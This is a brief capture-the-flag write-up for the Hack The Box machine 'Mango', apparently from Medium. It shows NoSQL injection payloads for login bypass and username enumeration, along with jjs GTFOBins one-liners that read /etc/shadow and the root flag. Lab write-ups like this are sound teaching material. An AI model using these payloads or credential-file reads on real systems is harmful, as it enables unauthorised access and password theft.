[HTB] Mango — Write-up

Recon

Nmap

$ nmap -Pn — open -sC -sV -p- -T4 10.10.10.162
Updating /etc/hosts
staging-order.mango.htb

Initial Foothold (MongoDB + NoSQL)

NoSQL Injection Attack

Example PoC of NoSQL Injection Exploit (Source: PayloadsAllTheThings)
username[$ne]=admin&password[$ne]=admin&login=login

NoSQL Injection Attack — User Enumeration

### Valid User
username=admin&password[$ne]=password&login=login --> 302 Found
### Invalid User
username=noOne&password[$ne]=password&login=login --> 200 OK

NoSQL Injection Attack — Extracting Passwords

exploit.py

User Access #1 (mango)

User Access #2 (mango → admin)

Root Access

GTFobins — JJS Exploit

### Reading /etc/shadow File
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/etc/shadow"));
while ((line = br.readLine()) != null) { print(line); }' | jjs

root.txt

### Reading /root/root.txt File
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }' | jjs

Conclusion

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store